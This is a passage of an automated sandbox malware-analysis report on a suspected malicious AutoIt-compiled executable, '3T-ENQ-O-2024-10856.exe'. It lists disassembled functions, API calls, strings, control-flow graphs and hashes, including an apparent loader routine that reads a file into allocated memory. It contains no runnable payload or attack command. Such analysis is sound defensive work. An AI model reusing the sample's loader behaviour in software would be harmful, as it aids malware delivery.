                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                • String ID: @
                                • API String ID: 3896587723-2766056989
                                • Opcode ID: 2c95f5f5d6b8102d4bf97baac29f3627725a4b3cf74c983808add19001e54dae
                                • Instruction ID: e599a8494aaf0b4b59ef52f0504dc4fd2f95c0af58b152156f146d954d17932f
                                • Opcode Fuzzy Hash: 2c95f5f5d6b8102d4bf97baac29f3627725a4b3cf74c983808add19001e54dae
                                • Instruction Fuzzy Hash: A42215719042059FEF259F68DC99BBE7B61EF00324F284229E531EB2E2D7358E50EB51
                                Function 00CB01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • _wcscpy.LIBCMT ref: 00CB026A
                                • _wcschr.LIBCMT ref: 00CB0278
                                • _wcscpy.LIBCMT ref: 00CB028F
                                • _wcscat.LIBCMT ref: 00CB029E
                                • _wcscat.LIBCMT ref: 00CB02BC
                                • _wcscpy.LIBCMT ref: 00CB02DD
                                • __wsplitpath.LIBCMT ref: 00CB03BA
                                • _wcscpy.LIBCMT ref: 00CB03DF
                                • _wcscpy.LIBCMT ref: 00CB03F1
                                • _wcscpy.LIBCMT ref: 00CB0406
                                • _wcscat.LIBCMT ref: 00CB041B
                                • _wcscat.LIBCMT ref: 00CB042D
                                • _wcscat.LIBCMT ref: 00CB0442
                                  • Part of subcall function 00CAC890: _wcscmp.LIBCMT ref: 00CAC92A
                                  • Part of subcall function 00CAC890: __wsplitpath.LIBCMT ref: 00CAC96F
                                  • Part of subcall function 00CAC890: _wcscpy.LIBCMT ref: 00CAC982
                                  • Part of subcall function 00CAC890: _wcscat.LIBCMT ref: 00CAC995
                                  • Part of subcall function 00CAC890: __wsplitpath.LIBCMT ref: 00CAC9BA
                                  • Part of subcall function 00CAC890: _wcscat.LIBCMT ref: 00CAC9D0
                                  • Part of subcall function 00CAC890: _wcscat.LIBCMT ref: 00CAC9E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                • String ID: >>>AUTOIT SCRIPT<<<
                                • API String ID: 2955681530-2806939583
                                • Opcode ID: f3e707e5d3b6866910f2668900d8b34e59a15aeb9622ddd443975d5904465993
                                • Instruction ID: d252f2d2ce5ccbc86c3e2e1563af519bfded81269bc6ccd4c052934a90f93436
                                • Opcode Fuzzy Hash: f3e707e5d3b6866910f2668900d8b34e59a15aeb9622ddd443975d5904465993
                                • Instruction Fuzzy Hash: B591D271104705AFCB20EB54C895FEBB3E8AF84314F04495DF9599B2A1EF34EA48DB92
                                Function 00C62F58 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00C62F8B
                                • RegisterClassExW.USER32(00000030), ref: 00C62FB5
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C62FC6
                                • InitCommonControlsEx.COMCTL32(?), ref: 00C62FE3
                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C62FF3
                                • LoadIconW.USER32(000000A9), ref: 00C63009
                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63018
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$3To
                                • API String ID: 2914291525-26617492
                                • Opcode ID: 518f13b98c5c3517aa026e33189848c2a71e8184b4b542ec09962579631270e9
                                • Instruction ID: c00e86a545cb349264a71842de82385eb08a428a6e48072642003a9c38f9f35e
                                • Opcode Fuzzy Hash: 518f13b98c5c3517aa026e33189848c2a71e8184b4b542ec09962579631270e9
                                • Instruction Fuzzy Hash: 252194B9900358AFDB509F94E889BCDBBB4FB28700F10811AF615EA2A0D7B54545CFA5
                                Function 00C64257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,00000000,00000001,00000000), ref: 00C6428C
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                  • Part of subcall function 00C81BC7: __wcsicmp_l.LIBCMT ref: 00C81C50
                                • _wcscpy.LIBCMT ref: 00C643C0
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00CD214E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe$CMDLINE$CMDLINERAW
                                • API String ID: 861526374-2296291692
                                • Opcode ID: ef6a8ca6bcc188487fb04c071e19bbd2e38322170f688dcba3d125083251df93
                                • Instruction ID: f4e688c78abc0dc658da65e557d9eeff82639392ce4d99552bfc3e7a61a55058
                                • Opcode Fuzzy Hash: ef6a8ca6bcc188487fb04c071e19bbd2e38322170f688dcba3d125083251df93
                                • Instruction Fuzzy Hash: 4F818076800219AACB25EBE0DD92EFF77B8EF14350F100025E542B6191EF706A45DBB1
                                Function 00CAC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 944 cac890-cac940 call c90650 call c8010a call c64bce call cac6a0 call c641a7 call c82203 957 cac9f3-cac9fa call cace59 944->957 958 cac946-cac94d call cace59 944->958 963 cac9fc-cac9fe 957->963 964 caca03 957->964 958->963 965 cac953-cac9f1 call c8297d call c81943 call c81914 call c8297d call c81914 * 2 958->965 966 cacc53-cacc54 963->966 968 caca06-cacac2 call c6417d * 8 call cad009 call c84129 964->968 965->968 969 cacc71-cacc7f call c64fd2 966->969 1003 cacacb-cacae6 call cac6e4 968->1003 1004 cacac4-cacac6 968->1004 1007 cacb78-cacb84 call c84274 1003->1007 1008 cacaec-cacaf4 1003->1008 1004->966 1015 cacb9a-cacb9e 1007->1015 1016 cacb86-cacb95 DeleteFileW 1007->1016 1009 cacafc 1008->1009 1010 cacaf6-cacafa 1008->1010 1012 cacb01-cacb1f call c6417d 1009->1012 1010->1012 1022 cacb49-cacb5f call cac07d call c8373e 1012->1022 1023 cacb21-cacb27 1012->1023 1018 cacc2e-cacc42 CopyFileW 1015->1018 1019 cacba4-cacc1b call cad10c call cad134 call cac251 1015->1019 1016->966 1020 cacc56-cacc6c DeleteFileW call cacfc8 1018->1020 1021 cacc44-cacc51 DeleteFileW 1018->1021 1019->1020 1040 cacc1d-cacc2c DeleteFileW 1019->1040 1020->969 1021->966 1035 cacb64-cacb6f 1022->1035 1026 cacb29-cacb3c call cac81a 1023->1026 1036 cacb3e-cacb47 1026->1036 1035->1008 1038 cacb75 1035->1038 1036->1022 1038->1007 1040->966
                                APIs
                                  • Part of subcall function 00CAC6A0: __time64.LIBCMT ref: 00CAC6AA
                                  • Part of subcall function 00C641A7: _fseek.LIBCMT ref: 00C641BF
                                • __wsplitpath.LIBCMT ref: 00CAC96F
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcscpy.LIBCMT ref: 00CAC982
                                • _wcscat.LIBCMT ref: 00CAC995
                                • __wsplitpath.LIBCMT ref: 00CAC9BA
                                • _wcscat.LIBCMT ref: 00CAC9D0
                                • _wcscat.LIBCMT ref: 00CAC9E3
                                  • Part of subcall function 00CAC6E4: _memmove.LIBCMT ref: 00CAC71D
                                  • Part of subcall function 00CAC6E4: _memmove.LIBCMT ref: 00CAC72C
                                • _wcscmp.LIBCMT ref: 00CAC92A
                                  • Part of subcall function 00CACE59: _wcscmp.LIBCMT ref: 00CACF49
                                  • Part of subcall function 00CACE59: _wcscmp.LIBCMT ref: 00CACF5C
                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CACB8D
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CACC24
                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CACC3A
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CACC4B
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CACC5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                • String ID:
                                • API String ID: 152968663-0
                                • Opcode ID: efe82e101f1a78e45cc3357f053ccc12629115418b87e383a8861187855a764c
                                • Instruction ID: 035b6e06d5338e6c6f78be36c766421dee14f711d1cb5b42c34280d1729e71c3
                                • Opcode Fuzzy Hash: efe82e101f1a78e45cc3357f053ccc12629115418b87e383a8861187855a764c
                                • Instruction Fuzzy Hash: 76C12CB190012DAEDF14DFA5CC81EEEBBBDAF49314F0040AAF609E6151DB709A84DF65
                                Function 00C7E975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1041 c7e975-c7ea18 1042 c7ea27-c7ead5 GetModuleFileNameW call c8297d call c82bbc call c82bff call c8010a call c81943 call c6d3d2 call c7eb05 1041->1042 1043 c7ea22 call c8010a 1041->1043 1057 c7eada-c7eade 1042->1057 1043->1042 1058 c7eaf7-c7eb00 1057->1058 1059 c7eae0-c7eaf4 call c65cd3 1057->1059 1060 cd32ba-cd32e0 call c6a4f6 * 2 1058->1060 1067 cd3308-cd3315 call c818fb 1060->1067 1068 cd32e2-cd32f0 call c6a4f6 1060->1068 1073 cd333b-cd338c call c8010a call c82c1d call c6a4f6 1067->1073 1074 cd3317-cd3328 call c818fb 1067->1074 1068->1067 1075 cd32f2-cd3303 call c81914 1068->1075 1073->1059 1082 cd3392-cd3393 1073->1082 1074->1073 1083 cd332a-cd333a call c81914 1074->1083 1075->1082 1082->1060 1083->1073
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C7EA39
                                • __wsplitpath.LIBCMT ref: 00C7EA56
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcsncat.LIBCMT ref: 00C7EA69
                                • __makepath.LIBCMT ref: 00C7EA85
                                  • Part of subcall function 00C82BFF: __wmakepath_s.LIBCMT ref: 00C82C13
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • _wcscpy.LIBCMT ref: 00C7EABE
                                  • Part of subcall function 00C7EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00C7EADA,?,?), ref: 00C7EB27
                                • _wcscat.LIBCMT ref: 00CD32FC
                                • _wcscat.LIBCMT ref: 00CD3334
                                • _wcsncpy.LIBCMT ref: 00CD3370
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                • String ID: Include$\
                                • API String ID: 1213536620-3429789819
                                • Opcode ID: 05816562f0bb3b23a2febe76a585fb96feb2084a08723eb7f692c18c3b34d949
                                • Instruction ID: 3f455b9322d8795d1115374aeeb0bbbe56342b9b37a9f698a1a7d2257d45ae01
                                • Opcode Fuzzy Hash: 05816562f0bb3b23a2febe76a585fb96feb2084a08723eb7f692c18c3b34d949
                                • Instruction Fuzzy Hash: BA516DB1404340ABC325EF55EC858AAB7F8FB69310B40452EF545C3361EB749A46DB7A
                                Function 00C629C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 c629c2-c629e2 1092 c629e4-c629e7 1090->1092 1093 c62a42-c62a44 1090->1093 1094 c62a48 1092->1094 1095 c629e9-c629f0 1092->1095 1093->1092 1096 c62a46 1093->1096 1100 c62a4e-c62a51 1094->1100 1101 cd2307-cd2335 call c6322e call c7ec33 1094->1101 1097 c629f6-c629fb 1095->1097 1098 c62aac-c62ab4 PostQuitMessage 1095->1098 1099 c62a2b-c62a33 DefWindowProcW 1096->1099 1105 cd238f-cd23a3 call ca57fb 1097->1105 1106 c62a01-c62a03 1097->1106 1107 c62a72-c62a74 1098->1107 1108 c62a39-c62a3f 1099->1108 1102 c62a76-c62a9d SetTimer RegisterWindowMessageW 1100->1102 1103 c62a53-c62a54 1100->1103 1136 cd233a-cd2341 1101->1136 1102->1107 1112 c62a9f-c62aaa CreatePopupMenu 1102->1112 1109 cd22aa-cd22ad 1103->1109 1110 c62a5a-c62a6d KillTimer call c62b94 call c62ac7 1103->1110 1105->1107 1129 cd23a9 1105->1129 1113 c62ab6-c62ac5 call c61e58 1106->1113 1114 c62a09-c62a0e 1106->1114 1107->1108 1122 cd22af-cd22b1 1109->1122 1123 cd22e3-cd2302 MoveWindow 1109->1123 1110->1107 1112->1107 1113->1107 1118 c62a14-c62a19 1114->1118 1119 cd2374-cd237b 1114->1119 1127 cd235f-cd236f call ca5fdb 1118->1127 1128 c62a1f-c62a25 1118->1128 1119->1099 1125 cd2381-cd238a call c9b31f 1119->1125 1131 cd22b3-cd22b6 1122->1131 1132 cd22d2-cd22de SetFocus 1122->1132 1123->1107 1125->1099 1127->1107 1128->1099 1128->1136 1129->1099 1131->1128 1137 cd22bc-cd22cd call c6322e 1131->1137 1132->1107 1136->1099 1141 cd2347-cd235a call c62b94 call c63598 1136->1141 1137->1107 1141->1099
                                APIs
                                • DefWindowProcW.USER32(?,?,?,?), ref: 00C62A33
                                • KillTimer.USER32(?,00000001), ref: 00C62A5D
                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C62A80
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C62A8B
                                • CreatePopupMenu.USER32 ref: 00C62A9F
                                • PostQuitMessage.USER32(00000000), ref: 00C62AAE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                • String ID: TaskbarCreated
                                • API String ID: 129472671-2362178303
                                • Opcode ID: 6b47068a6d824b01c8680729d9be0b9f95438062a4a562e2eb58a717c1ad44d7
                                • Instruction ID: 1278aca388255246c86767d8a6cbd57167407831e98f8aacee31c372362e6622
                                • Opcode Fuzzy Hash: 6b47068a6d824b01c8680729d9be0b9f95438062a4a562e2eb58a717c1ad44d7
                                • Instruction Fuzzy Hash: 2E418D34114A86ABDB34AFA4ACC9B7D3759F734300F044215F512D62A2DAB08E40B771
                                Function 00C630A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00C630B0
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00C630BF
                                • LoadIconW.USER32(00000063), ref: 00C630D5
                                • LoadIconW.USER32(000000A4), ref: 00C630E7
                                • LoadIconW.USER32(000000A2), ref: 00C630F9
                                  • Part of subcall function 00C6318A: LoadImageW.USER32(00C60000,00000063,00000001,00000010,00000010,00000000), ref: 00C631AE
                                • RegisterClassExW.USER32(?), ref: 00C63167
                                  • Part of subcall function 00C62F58: GetSysColorBrush.USER32(0000000F), ref: 00C62F8B
                                  • Part of subcall function 00C62F58: RegisterClassExW.USER32(00000030), ref: 00C62FB5
                                  • Part of subcall function 00C62F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C62FC6
                                  • Part of subcall function 00C62F58: InitCommonControlsEx.COMCTL32(?), ref: 00C62FE3
                                  • Part of subcall function 00C62F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C62FF3
                                  • Part of subcall function 00C62F58: LoadIconW.USER32(000000A9), ref: 00C63009
                                  • Part of subcall function 00C62F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63018
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                • String ID: #$0$AutoIt v3
                                • API String ID: 423443420-4155596026
                                • Opcode ID: 2a167a7fa72c8f0b0b761ba0c3f1a136b41d213defbd904e3c864b0ad277d236
                                • Instruction ID: 7aef6020512fb53d5f0762d92f4ca66f09fed07a8a899b7d1821bbc51feba663
                                • Opcode Fuzzy Hash: 2a167a7fa72c8f0b0b761ba0c3f1a136b41d213defbd904e3c864b0ad277d236
                                • Instruction Fuzzy Hash: 88215EB4D00344ABCB21DFA9EC49B9DBBF5EB68310F00812AE614E63A0D37546518FA5
                                Function 033925E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1154 33925e0-339268e call 3390000 1157 3392695-33926bb call 33934f0 CreateFileW 1154->1157 1160 33926bd 1157->1160 1161 33926c2-33926d2 1157->1161 1162 339280d-3392811 1160->1162 1169 33926d9-33926f3 VirtualAlloc 1161->1169 1170 33926d4 1161->1170 1163 3392853-3392856 1162->1163 1164 3392813-3392817 1162->1164 1166 3392859-3392860 1163->1166 1167 3392819-339281c 1164->1167 1168 3392823-3392827 1164->1168 1171 3392862-339286d 1166->1171 1172 33928b5-33928ca 1166->1172 1167->1168 1173 3392829-3392833 1168->1173 1174 3392837-339283b 1168->1174 1175 33926fa-3392711 ReadFile 1169->1175 1176 33926f5 1169->1176 1170->1162 1177 339286f 1171->1177 1178 3392871-339287d 1171->1178 1179 33928da-33928e2 1172->1179 1180 33928cc-33928d7 VirtualFree 1172->1180 1173->1174 1181 339284b 1174->1181 1182 339283d-3392847 1174->1182 1183 3392718-3392758 VirtualAlloc 1175->1183 1184 3392713 1175->1184 1176->1162 1177->1172 1187 339287f-339288f 1178->1187 1188 3392891-339289d 1178->1188 1180->1179 1181->1163 1182->1181 1185 339275a 1183->1185 1186 339275f-339277a call 3393740 1183->1186 1184->1162 1185->1162 1194 3392785-339278f 1186->1194 1190 33928b3 1187->1190 1191 33928aa-33928b0 1188->1191 1192 339289f-33928a8 1188->1192 1190->1166 1191->1190 1192->1190 1195 3392791-33927c0 call 3393740 1194->1195 1196 33927c2-33927d6 call 3393550 1194->1196 1195->1194 1202 33927d8 1196->1202 1203 33927da-33927de 1196->1203 1202->1162 1204 33927ea-33927ee 1203->1204 1205 33927e0-33927e4 CloseHandle 1203->1205 1206 33927fe-3392807 1204->1206 1207 33927f0-33927fb VirtualFree 1204->1207 1205->1204 1206->1157 1206->1162 1207->1206
                                APIs
                                • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 033926B1
                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 033928D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateFileFreeVirtual
                                • String ID:
                                • API String ID: 204039940-0
                                • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                • Instruction ID: 6718cfbe76ca848e5dbd8ac3872ffce9e69e824f1f6d72382423dccda7b99312
                                • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                • Instruction Fuzzy Hash: D6A10674E04209EBEF14CFA4C894BEEB7B5BF48305F24859AE511BB280D7759A81CF94
                                Function 00C7E9C9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C7EA39
                                • __wsplitpath.LIBCMT ref: 00C7EA56
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcsncat.LIBCMT ref: 00C7EA69
                                • __makepath.LIBCMT ref: 00C7EA85
                                  • Part of subcall function 00C82BFF: __wmakepath_s.LIBCMT ref: 00C82C13
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • _wcscpy.LIBCMT ref: 00C7EABE
                                  • Part of subcall function 00C7EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00C7EADA,?,?), ref: 00C7EB27
                                • _wcscat.LIBCMT ref: 00CD32FC
                                • _wcscat.LIBCMT ref: 00CD3334
                                • _wcsncpy.LIBCMT ref: 00CD3370
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                • String ID: Include
                                • API String ID: 1213536620-3205518615
                                • Opcode ID: 77a02fbee1f3c5dc12d0e72a60dfd46da9a73cabbaecc20c4fbab1e1cf38a52d
                                • Instruction ID: 9ea67360c83e0035a65e96cc32f55ae87bd0fed08671d5e94a9871c3fd5469ef
                                • Opcode Fuzzy Hash: 77a02fbee1f3c5dc12d0e72a60dfd46da9a73cabbaecc20c4fbab1e1cf38a52d
                                • Instruction Fuzzy Hash: C931FCB2404304ABC325EF55EC85DAA77FCF769314B800A2EF545C2361DB749A09DB75
                                Function 00C7EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
